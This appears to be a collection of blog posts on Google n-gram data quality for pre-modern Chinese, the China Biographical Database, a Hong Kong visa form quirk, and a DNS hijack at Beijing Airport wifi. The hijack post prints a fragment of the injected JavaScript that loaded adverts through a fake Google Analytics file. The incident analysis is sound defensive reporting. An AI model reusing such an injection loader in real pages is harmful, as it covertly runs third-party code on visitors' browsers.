When n-grams go bad

This is a follow-up to “Google n-grams and pre-modern Chinese”: other features of the Google n-gram viewer may help shed some light on the issues with the pre-1950 data for Chinese.

One useful feature is wildcard search, which allows various open-ended searches, the simplest of these being a search for “*”, which plots the most frequent 1-grams in a corpus – i.e. the most commonly occurring words. For example, if we input a single asterisk as our search query on the English corpus, we get the frequencies of the ten most common English words:

The results look plausible at least as far back as 1800, which is what the authors claim to be the reliable part of the data. Earlier than that things get shakier, and before about 1650 things get quite seriously out of hand:

Remember, these are the most common terms in the corpus, i.e. the ones for which the data is going to be the most reliable. Now let’s look at the equivalent figures for Chinese. Firstly, we can get a nice baseline showing what we would like to see by doing the equivalent search on a relatively reliable part of the data, e.g. 1970 to 2000:

This looks good. The top ten 1-grams – i.e. the most frequently occurring terms – are all commonly occurring Chinese words. Now let’s try going back to 1800:

Oh dear. From 1800 to 2000, of the ten most frequent 1-grams, more than half are not terms that plausibly occur in pre-modern Chinese texts at all. Note also that the scale of the y axis has now changed: according to this graph, it would appear that up to 40% of terms in pre-1940 texts may have been detected as being URLs or other non-textual content. Unsurprisingly, these problems continue all the way back to 1500:

It’s unclear what exactly _URL_, ^_URL_, and @_URL_ are supposed to represent as they don’t seem to be documented, and none of them is accepted by the viewer as a valid query term, so we can’t easily check what their values are on the English data. Possibly they are just categorization tags that don’t affect the overall counts and thus normalized frequencies, but even so they surely point to serious problems with the data that have caused up to 50% of terms to be so interpreted.

Even aside from these suspect “URLs”, the other most frequent terms returned indicate that three terms not plausibly occurring in pre-modern Chinese texts – “0”, “1”, and “I” – account for anything up to 20% or more of all terms in the pre-1900 data:

Since all the n-gram counts are normalized by the total number of terms, these issues (presumably primarily caused by OCR errors) affect all results for Chinese in any year in which they occur. So while 1800 might be a reasonable cut-off for meaningful interpretation of the English data, for Chinese 1970 looks like a better choice, and any results from before around 1940 will be largely meaningless due to the overwhelming amount of noise.
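To make the normalization point concrete, here is a minimal sketch with entirely hypothetical counts (none of these numbers come from the Google data). It assumes a relative frequency is simply a term's count divided by the total number of tokens for that year, and shows how spurious tokens in the denominator drag down the apparent frequency of every genuine term.

```python
def relative_frequency(term_count: int, total_tokens: int) -> float:
    """Relative frequency of a term: its count over all tokens in that year."""
    return term_count / total_tokens


# Hypothetical figures for a single year, chosen only for illustration.
genuine_tokens = 400_000   # tokens that really are Chinese words
noise_tokens = 600_000     # spurious tokens such as "^", "0", "1", "I"
term_count = 2_000         # occurrences of some genuine term

clean = relative_frequency(term_count, genuine_tokens)
noisy = relative_frequency(term_count, genuine_tokens + noise_tokens)

print(f"without noise: {clean:.4%}")
print(f"with noise:    {noisy:.4%}")
print(f"apparent frequency is {noisy / clean:.0%} of the true value")
```

With noise making up 60% of the tokens, every genuine term appears at only 40% of its true frequency, and because the noise share changes from year to year, the shape of the plotted curve changes too.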

Update April 18, 2015:

It appears that the @_URL_ and ^_URL_ actually correspond to the terms “@” and “^” (both, presumably, tagged with “URL”), and so these do indeed affect the results: for many years pre-1950, anything up to 60% of all terms in the corpus are the term “^”:

It seems that the data used for Chinese fails some fairly basic sanity checks (including “is it in Chinese?”).

Posted in Digital humanities | Leave a comment

Google n-grams and pre-modern Chinese

The Google n-gram viewer allows real-time searching of the frequencies of words and word sequences over time across a large corpus of texts digitized as part of the Google Books project. Without getting into the debate as to whether things like broad cultural trends can legitimately be deduced from these results, it seems clear that access to term and n-gram frequency statistics generated from a large enough corpus at least ought to be able to tell us interesting things about observed word use (though probably with important caveats about things like selection of material).

So the fact that Google’s n-gram results include data for Chinese (albeit only in simplified characters) going back as far as 1500 AD sounds very promising. The online n-gram viewer allows querying of this data, so we can immediately get some results. For example, if we keep the default search scope of 1800-2000 (the authors themselves acknowledge that data gets quite sparse before 1800 so data from earlier than that may be less meaningful), and search for a single character like “万”, we get a nice graph of its frequency over time:

This looks like a good start, although we get noticeably less smooth results from the pre-1960 part of the graph. Trying some other characters, we can get some nice results like this one that seem plausibly attributable to the shift from literary to vernacular Chinese:

Unfortunately though, further queries quickly show the limitations of the data. According to the Google n-gram data, “Mengzi”, the name both of one of the most revered Chinese philosophers of the classical period and of the hugely important canonical text attributed to him, is first mentioned in 1927:

Confucius himself doesn’t fare much better, especially when we go back earlier than 1800 – and the Analects doesn’t even get mentioned once until the 1950s:

Ouch. So it looks like there may be some pretty serious issues with the data even after 1800, and perhaps even as late as 1950. Of course, for a variety of reasons we would expect there to be more data available for the last 50 years or so. How much data is there? Luckily this information is available online.

Looking at the numbers it quickly becomes clear that the pre-modern data is fairly sparse: the first entry in the “total counts” file is for the year 1510, and records only 2206 “matches” (i.e. total 1-grams) from a single volume of 231 pages. This compares with the first English entry, for 1505, with 32059 matches for one volume of 231 pages. Apart from the total quantity of data, one worry is that the number of recorded 1-grams does not seem to fit well with the number of pages – apparently there are fewer than ten recorded 1-grams per page for this volume, which seems improbably few. Adding up the total 1-grams for each year, we get a total of 65195 1-grams by 1560, and by 1900 the figure increases to over 11 million – still less than 0.05% of the total for the whole set (over 26 billion), but definitely enough for us to reasonably expect non-zero results for common terms.
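The per-page arithmetic above can be reproduced with a short script. This is a sketch under an assumption about the file layout: it treats the “total counts” file as tab-separated records of the form year,match_count,page_count,volume_count. The two sample records use only the figures quoted above, and the final share uses the rounded totals from the text, so it is an approximation.

```python
from typing import List, NamedTuple


class YearTotal(NamedTuple):
    year: int
    match_count: int   # total 1-grams recorded for the year
    page_count: int
    volume_count: int


def parse_total_counts(text: str) -> List[YearTotal]:
    """Parse tab-separated 'year,matches,pages,volumes' records (assumed layout)."""
    records = []
    for field in text.split("\t"):
        field = field.strip()
        if not field:
            continue  # skip empty fields from leading or trailing tabs
        year, matches, pages, volumes = (int(part) for part in field.split(","))
        records.append(YearTotal(year, matches, pages, volumes))
    return records


def ones_per_page(record: YearTotal) -> float:
    """Average number of recorded 1-grams per page for one year."""
    return record.match_count / record.page_count


chinese_first = parse_total_counts("1510,2206,231,1")[0]
english_first = parse_total_counts("1505,32059,231,1")[0]

print(f"Chinese {chinese_first.year}: {ones_per_page(chinese_first):.1f} 1-grams per page")
print(f"English {english_first.year}: {ones_per_page(english_first):.1f} 1-grams per page")

# Rounded totals from the text: over 11 million by 1900, over 26 billion overall.
share_by_1900 = 11_000_000 / 26_000_000_000
print(f"share of all 1-grams by 1900: about {share_by_1900:.3%}")
```

Running the same function over the full file for each language would make it easy to spot other years in which the 1-gram count looks implausibly low for the number of pages.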

So it does seem surprising that so many results should end up being zero even in cases where Google Books does have some data. For instance, although a search for “寡人” again has no data for any pre-1950 texts, the n-gram viewer itself provides a handy link to “Search in Google Books: 1800 – 1957”, which does return a number of results. This is interesting, because the search results in Google Books also give snippets of Google’s corresponding OCR results. For instance, Google Books has “寡人” occurring on various pages of a book it describes as “馬氏繹史: 160卷年表, 第 13-24 卷”, published according to Google Books in 1897:

Given the apparent errors (although the book is surely in the public domain, no image view or download is available) this book may have been excluded because of poor OCR quality or other reasons, and/or assigned a different date (the text itself being composed earlier than the publication of this edition). (An interesting aside: the results you get for the same search within the same volume of Google Books vary with location. In this case, “寡人” within this volume gets 67 results from Hong Kong, but only 35 from the US.) The first hit looks like it might correspond to parts of this page and the following one on the Chinese Text Project (based on a different edition of the text however).

A final issue that may affect the results is that of tokenization. Since Chinese doesn’t delimit words, the texts first have to be split into words based upon their content. So not every sequence of the characters “寡” and “人” will be counted as an instance of the term “寡人”. This is likely to introduce further problems, partly because it’s a somewhat difficult problem to begin with, but also because it will become a near-impossible task when additional corruption of the source text is introduced through OCR.
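As an illustration of why adjacent characters are not always counted as a term, here is a toy greedy segmenter (forward maximum matching against a small dictionary). It is not the method used to build the Google data, which is not described here. The dictionary and example strings are hypothetical and chosen only to show the effect.

```python
from typing import List, Set


def forward_max_match(text: str, dictionary: Set[str], max_len: int = 4) -> List[str]:
    """Greedy segmentation: at each position take the longest dictionary word,
    falling back to a single character when nothing matches."""
    tokens = []
    i = 0
    while i < len(text):
        for length in range(min(max_len, len(text) - i), 0, -1):
            candidate = text[i:i + length]
            if length == 1 or candidate in dictionary:
                tokens.append(candidate)
                i += length
                break
    return tokens


# Hypothetical toy dictionary; a real segmenter would use a far larger lexicon.
toy_dictionary = {"寡人", "孤寡", "人家"}

first = forward_max_match("寡人之於國也", toy_dictionary)
second = forward_max_match("孤寡人家", toy_dictionary)

print(first)   # "寡人" is found as a token here
print(second)  # "寡" and "人" are adjacent, but split between two other words
print("寡人" in "孤寡人家", "寡人" in second)
```

In the second string the characters “寡” and “人” sit side by side, yet the segmenter assigns them to different words, so the 1-gram “寡人” is not counted. A single misrecognized character from OCR can shift such boundaries in the same way.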

In summary, it seems that the Google n-gram data may still need some work before it will be useful for pre-modern Chinese.

Followup post: When n-grams go bad


China Biographical Database

The China Biographical Database Project (CBDB) describes itself as “an online relational database with biographical information about approximately 328,000 individuals as of May 2014, primarily from the 7th through 19th centuries”. A joint project of Harvard’s Fairbank Center for Chinese Studies, Academia Sinica’s Institute of History and Philology, and Peking University’s Center for Research on Ancient Chinese History, the project’s relatively compact website belies an extraordinary wealth of structured data that is available for download in the form of an Access database, and can also be directly queried using an API.

The level of detail included in the database is quite astounding – and, crucially for this kind of material, the data is carefully structured such that many kinds of complex queries for specific types of information are possible.

The underlying tables that store the information can also be accessed directly to construct complex queries, or to export subsets of the data:

A simple public API is also offered that allows direct querying of the data and returns either human-readable HTML or structured data in XML or JSON. At present the only supported queries for this API appear to be names in Chinese or Pinyin and record number, which significantly limits its flexibility versus the Access database, but for applications where these queries are sufficient it provides a very neat way of accessing the data in a structured format. According to the site, at least four other projects are currently making use of the API.

Surprisingly, even though the entire database is made freely available for download, I found no explicit license or statement as to acceptable reuse of the data other than the generic copyright notice at the bottom of the website, so it is unclear whether it is intended to be open source, though it is clearly open access.


Beijing Airport Wifi hacked: DNS attack pushes adverts to sites via Google Analytics

While at Beijing Airport recently, I connected to the official airport wifi service, and noticed something strange when visiting ctext.org:

A large floating advert had appeared at the bottom right of every page of the site, obscuring much of the content.

Could the site have been hacked? I searched the HTML source for unusual JavaScript or iframe additions, but there weren’t any – all the code included should have been legitimate. Only one inclusion was not from ctext.org: the standard Google Analytics code, which loads asynchronously from http://www.google-analytics.com/ga.js. Let’s take a look at that file when retrieved over Beijing Airport wifi:

var sign = new Error('log').stack;
var regx = /.*\/(.*?\.js.*?)/;
var group = sign.match(regx);
var s = group[1];
var url = "" + s;
var jsNode = document.createElement('script');
var head = document.getElementsByTagName('head').item(0);

This code basically says something like “fetch an advert from another address and attach it to this webpage” – definitely not what Google Analytics ought to be doing. So why is this happening?

home:~ user$ ping www.google-analytics.com
PING www-google-analytics.l.google.com ( 56 data bytes
64 bytes from icmp_seq=0 ttl=58 time=36.207 ms
64 bytes from icmp_seq=1 ttl=58 time=38.659 ms

OK, so www.google-analytics.com is resolving to… who does that belong to?

home:~ user$ whois

# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml

# Query terms are ambiguous.  The query is assumed to be:
#     "n"
# Use "?" to get help.

# The following results may also be obtained via:
# http://whois.arin.net/rest/nets;q=

NetRange: -
NetName:        APNIC-203
NetHandle:      NET-203-0-0-0-1
Parent:          ()
NetType:        Allocated to APNIC
Organization:   Asia Pacific Network Information Centre (APNIC)
RegDate:        1994-04-05
Updated:        2010-08-02
Comment:        This IP address range is not registered in the ARIN database.
Comment:        For details, refer to the APNIC Whois Database via
Comment:        WHOIS.APNIC.NET or http://wq.apnic.net/apnic-bin/whois.pl
Comment:        ** IMPORTANT NOTE: APNIC is the Regional Internet Registry
Comment:        for the Asia Pacific region. APNIC does not operate networks
Comment:        using this IP address range and is not able to investigate
Comment:        spam or abuse reports relating to these addresses. For more
Comment:        help, refer to http://www.apnic.net/apnic-info/whois_search2/abuse-and-spamming
Ref:            http://whois.arin.net/rest/net/NET-203-0-0-0-1

OrgName:        Asia Pacific Network Information Centre
OrgId:          APNIC
Address:        PO Box 3646
City:           South Brisbane
StateProv:      QLD
PostalCode:     4101
Country:        AU
Updated:        2012-01-24
Ref:            http://whois.arin.net/rest/org/APNIC

ReferralServer: whois://whois.apnic.net

OrgTechHandle: AWC12-ARIN
OrgTechName:   APNIC Whois Contact
OrgTechPhone:  +61 7 3858 3188
OrgTechEmail:  search-apnic-not-arin@apnic.net
OrgTechRef:    http://whois.arin.net/rest/poc/AWC12-ARIN

OrgAbuseHandle: AWC12-ARIN
OrgAbuseName:   APNIC Whois Contact
OrgAbusePhone:  +61 7 3858 3188
OrgAbuseEmail:  search-apnic-not-arin@apnic.net
OrgAbuseRef:    http://whois.arin.net/rest/poc/AWC12-ARIN

# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/whois_tou.html
# If you see inaccuracies in the results, please report at
# http://www.arin.net/public/whoisinaccuracy/index.xhtml

% [whois.apnic.net]
% Whois data copyright terms    http://www.apnic.net/db/dbcopyright.html

% Information related to ' -'

inetnum: -
netname:        GOOGLECN
descr:          Beijing Gu Xiang Information Technology Co.,Ltd.
descr:          Bldg 6, No.1 Zhongguancun East Rd, Beijing
country:        CN
admin-c:        ZM657-AP
tech-c:         ZM657-AP
status:         ALLOCATED PORTABLE
mnt-by:         MAINT-CNNIC-AP
mnt-lower:      MAINT-CNNIC-AP
mnt-routes:     MAINT-CNNIC-AP
mnt-irt:        IRT-CNNIC-CN
changed:        ipas@cnnic.cn 20110412
source:         APNIC

irt:            IRT-CNNIC-CN
address:        Beijing, China
e-mail:         ipas@cnnic.cn
abuse-mailbox:  ipas@cnnic.cn
admin-c:        IP50-AP
tech-c:         IP50-AP
auth:           # Filtered
remarks:        Please note that CNNIC is not an ISP and is not
remarks:        empowered to investigate complaints of network abuse.
remarks:        Please contact the tech-c or admin-c of the network.
mnt-by:         MAINT-CNNIC-AP
changed:        ipas@cnnic.cn 20110428
source:         APNIC

person:         GOOGLECN Contact
address:        Kejian Building
address:        Tsinghua Science Park Building 6
address:        No. 1 Zhongguancun East Road
address:        Haidian District
address:        Beijing P.R. China 100084
country:        CN
phone:          +86-10-62503000
fax-no:         +86-10-62503001
e-mail:         cnnic-contact@google.com
nic-hdl:        ZM657-AP
mnt-by:         MAINT-CNNIC-AP
changed:        ipas@cnnic.net 20110426
source:         APNIC

% Information related to ''

descr:          FM SITE5
origin:         AS24424
notify:         nst@corp.ganji.com
mnt-by:         MAINT-CNNIC-AP
changed:        nst@corp.ganji.com 20060612
source:         APNIC

% This query was served by the APNIC Whois Service version 1.69.1-APNICv1r3 (WHOIS4)

Huh. That’s strange – the IP serving the fake Analytics code is actually allocated to GOOGLECN, registered to Google’s office in Beijing. What’s up with that? There’s definitely something funny going on here, presumably relating to the last part of the query response about ultimately belonging to “FM SITE5” and perhaps being associated with ganji.com.

Anyway, it looks like what is happening is that someone is altering the DNS response for www.google-analytics.com to point to a server they control so they can display adverts on other people’s websites – in fact on any website that uses Google Analytics. For example:
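One rough way to notice this kind of tampering is to compare the addresses a hostname resolves to on the current network against the networks you expect it to live in. The sketch below is only an illustration. The expected ranges are an assumption you would have to supply yourself (for example from a lookup made on a trusted connection), and the addresses shown come from the reserved documentation ranges, not from the incident described here.

```python
import ipaddress
import socket
from typing import Iterable, List


def resolve_ipv4(hostname: str) -> List[str]:
    """Return the IPv4 addresses the local resolver gives for a hostname."""
    infos = socket.getaddrinfo(hostname, 80, family=socket.AF_INET,
                               type=socket.SOCK_STREAM)
    return sorted({info[4][0] for info in infos})


def outside_expected(addresses: Iterable[str],
                     expected_networks: Iterable[str]) -> List[str]:
    """Return the addresses that fall in none of the expected networks."""
    networks = [ipaddress.ip_network(net) for net in expected_networks]
    return [
        addr for addr in addresses
        if not any(ipaddress.ip_address(addr) in net for net in networks)
    ]


# Hypothetical data using reserved documentation ranges (192.0.2.0/24 and
# 198.51.100.0/24); real use would pass the output of resolve_ipv4(...).
expected = ["192.0.2.0/24"]
seen = ["192.0.2.10", "198.51.100.7"]

suspicious = outside_expected(seen, expected)
print("addresses outside the expected networks:", suspicious)
```

A mismatch is not proof of an attack, since large services legitimately resolve to different addresses in different places, but it is a cheap signal that the answer deserves a closer look. As the whois output above shows, an unexpected address can even belong to a plausible-looking owner.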

It has to be said that this is a pretty good scam. After all, unless users are already familiar with the site they are visiting, they may simply assume that the adverts are legitimate ones run by the owners of these sites, while the profits go to the scammer and the site owner remains unaware that anything has happened. So who’s the scammer? Assuming this scam does not originate with someone at Google China or Beijing Airport, it seems most likely that someone’s router has been hacked, as has recently been reported elsewhere:

The scary thing about this is that the malicious code can easily be set to do all sorts of things – displaying adverts is relatively benign compared to popups appearing to come from legitimate and trusted sites that trick users into downloading malware-ridden software or direct attacks on known browser weaknesses, for instance. By compromising routers that service large numbers of users – airport wifi being an excellent example – scams taking advantage of Google Analytics code can quickly affect large numbers of people. Since from a user perspective the genuine Analytics code has no visible effect, its replacement with malicious code can be easily overlooked.

Posted in Uncategorized | Comments Off

HK Visa Online Application Status Enquiry – Invalid Reference Number

This post is a little off-topic, but perhaps will help people Googling with the same problem.

A trivial issue nearly prevented me from being able to determine the status of my Hong Kong visa application online. The reference number I’d been given was of the form XXXX-nnnn-nn – four letters, four digits, then another two digits:

When I tried submitting the code exactly as (hand-)written on my receipt, the system told me the number was invalid:

For some reason the programmer in me thought, “surely it couldn’t be that the fields have to be zero padded?” – so I tried adding zeros to the middle field until the form would allow no more. Now displaying “XXXX-000nnnn-nn”, I submitted the form, and was amazed to see that it worked! Presumably the software makes a string comparison even for the numeric fields, so the reference number must have exactly 7 digits in the middle field:
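The workaround amounts to left-padding the middle field with zeros. A small sketch of that normalization follows. The function name is made up for illustration, the seven-digit width is the one observed above, and the sample number is invented.

```python
def pad_reference_number(reference: str, middle_width: int = 7) -> str:
    """Zero-pad the middle field of an 'XXXX-nnnn-nn' style reference number."""
    parts = reference.strip().split("-")
    if len(parts) != 3:
        raise ValueError("expected three fields separated by '-'")
    prefix, middle, suffix = parts
    if not middle.isdigit():
        raise ValueError("middle field must contain only digits")
    # zfill leaves the field unchanged if it is already wide enough.
    return "-".join([prefix, middle.zfill(middle_width), suffix])


# Invented sample reference number in the handwritten form.
print(pad_reference_number("ABCD-1234-56"))
```

Had the form applied this kind of padding itself before comparing, the number could have been entered exactly as written on the receipt.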

In my case it turned out that being able to check online was very useful, as nobody was answering the phone at the relevant immigration department, and once I was finally able to check online, I discovered that my application was already approved and ready to collect.

I couldn’t find any mention of this in the instructions, and it certainly wasn’t obvious from the error message (I’d assumed that my application must be of the “not supported” type) – perhaps this report will help someone else check their status (or help someone at the immigration department fix their software/error message).
